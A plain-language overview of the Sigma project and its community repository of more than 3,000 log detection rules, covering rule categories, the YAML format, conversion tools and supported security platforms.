sigmahq/sigma

Sigma is an open format for writing detection rules that describe suspicious patterns in log files. When a company runs servers and applications, those systems produce logs, which are records of every action that happens. Security teams analyze those logs to look for signs of attackers or malware. The problem is that every security monitoring platform uses its own query language, so a detection rule written for one tool cannot be used in another. Sigma solves this by providing a common format: you write the rule once, then convert it to whatever language your particular security platform uses. This repository is the main collection of Sigma rules maintained by the community. It currently holds more than 3,000 detection rules organized into several categories. Generic detection rules look for behaviors associated with attack techniques regardless of who is doing the attacking. Threat hunting rules are broader and give security analysts a starting point for investigating suspicious patterns. Emerging threat rules cover specific, time-sensitive events like the exploitation of a freshly discovered vulnerability or an active attack campaign. Compliance rules help teams spot log events that indicate a violation of security frameworks like CIS Controls or NIST. The rules are written in YAML, which is a plain-text format that is meant to be readable by humans and machines alike. You can convert them to your platform's query language using a command-line tool called Sigma CLI or a web interface at sigconverter.io. A wide range of commercial and open-source security platforms already support Sigma rules directly, including IBM QRadar, MISP, and several others listed in the README. The project is community-driven and peer-reviewed, meaning rule submissions go through a review process before being accepted into the main repository.